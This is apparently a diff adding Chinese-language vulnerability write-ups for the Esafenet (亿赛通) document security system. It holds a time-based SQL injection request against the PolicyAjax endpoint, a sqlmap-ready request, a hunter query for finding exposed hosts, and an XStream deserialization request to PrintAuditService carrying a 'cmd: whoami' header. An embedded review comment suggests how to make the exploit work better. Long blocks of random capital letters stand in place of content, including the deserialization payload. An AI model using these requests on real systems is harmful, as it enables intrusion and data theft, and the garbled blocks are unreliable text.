IANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKI
BLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJA
NECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJB
DJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJ
NBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJ
IPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK +``` + +![1706614725312-fce23f6b-55c1-4c1d-88b6-57f8f2eba2c8.png](./img/mNluLungjp6mX99D/1706614725312-fce23f6b-55c1-4c1d-88b6-57f8f2eba2c8-305380.png) + + + +> 更新: 2024-04-20 22:01:30 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/wz2tmtu1guybh6uz> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md new file mode 100644 index 0000000..e0ed595 --- /dev/null +++ b/亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞.md 
@@ -0,0 +1,61 @@ +# 亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞 + +# 一、漏洞简介 + 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进行全生命周期防护,系统具有透明加密、主动加密、智能加密等多种加密方式,用户可根据部门涉密程度的不同(如核心部门和普通部门),部署力度轻重不一的梯度式文档加密防护,实现技术、管理、审计进行有机的结合,在内部构建起立体化的整体信息防泄露体系,使得成本、效率和安全三者达到平衡,实现电子文档的数据安全。亿赛通电子文档安全管理系统PolicyAjax存在SQL注入漏洞,攻击者可通过该漏洞获取数据库敏感信息。 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/f3AbW-RS96XvK7XY/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-693103.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 64 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded +Pragma: no-cache +Upgrade-Insecure-Requests: 1 + +command=selectOption&id=1';WAITFOR DELAY '0:0:5'--&type=JMCL +``` + +![1706531531789-5d3e4e10-b8a8-43a3-bca6-fffb757ac467.png](./img/f3AbW-RS96XvK7XY/1706531531789-5d3e4e10-b8a8-43a3-bca6-fffb757ac467-654309.png) + +sqlmap + +```plain +POST /CDGServer3/dojojs/../PolicyAjax HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 +Content-Length: 64 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: no-cache +Connection: close +Content-Type: application/x-www-form-urlencoded +Pragma: no-cache +Upgrade-Insecure-Requests: 1 + 
+command=selectOption&id=1&type=JMCL +``` + +![1706531565480-674887a2-8ef1-4fc3-ad2c-5ed7a84ec96c.png](./img/f3AbW-RS96XvK7XY/1706531565480-674887a2-8ef1-4fc3-ad2c-5ed7a84ec96c-451959.png) + +[亿赛通电子文档安全管理系统-policyajax-sql注入.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713621695239-0f1784ad-ca08-49f2-8175-88860849d9db.yaml) + + + +> 更新: 2024-04-20 22:01:35 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gh6izxum78ql1255> \ No newline at end of file diff --git a/亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md new file mode 100644 index 0000000..130008c --- /dev/null +++ b/亿赛通电子文档安全管理系统PrintAuditService存在xstream反序列化漏洞.md 
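Review bot: the `Content-Length: 64` header on the second (sqlmap) request is wrong: the body `command=selectOption&id=1&type=JMCL` is 35 bytes, so a server that honours the declared length will sit waiting for bytes that never arrive; either drop the header from the saved request (sqlmap recomputes it from `-r` input) or set it to the real body size. The write-up also never says what a positive result looks like: `WAITFOR DELAY '0:0:5'` is T-SQL, so the observable is a response delayed by roughly five seconds and the backend is SQL Server, neither of which the 漏洞简介 states. The `dojojs/../` segment in `/CDGServer3/dojojs/../PolicyAjax` is unexplained; if it is there so the request reaches `PolicyAjax` through a path the access filter does not check, say so in 漏洞复现, otherwise a reader with a normalizing client will collapse it to `/CDGServer3/PolicyAjax` and not know whether that still works. Finally the sqlmap section gives only a raw request and no invocation; one line such as `python3 sqlmap.py -r policyajax.txt -p id --batch` would make the entry usable as written.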
@@ -0,0 +1,36 @@ +# 亿赛通电子文档安全管理系统PrintAuditService存在xstream 反序列化漏洞 + +# 一、漏洞简介 + 亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品,保护范围涵盖终端电脑(Windows、Mac、Linux系统平台)、智能终端(Android、IOS)及各类应用系统(OA、知识管理、文档管理、项目管理、PDM等)。亿赛通电子文档安全管理系统PrintAuditService存在xstream 反序列化漏洞 + +# 二、影响版本 ++ 亿赛通电子文档安全管理系统 + +# 三、资产测绘 ++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"` ++ 登录页面 + +![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/XmvjKIvAHgRrl84Y/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-102111.png) + +# 四、漏洞复现 +```plain +POST /CDGServer3/PrintAuditService HTTP/1.1 +Accept: */* +User-Agent: Mozilla/5.0 +Connection: close +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.8 +Content-Type: text/xml +Host: 192.168.110.187:8090 +cmd: whoami +Content-Length: 14756 + +NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDG
LNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAM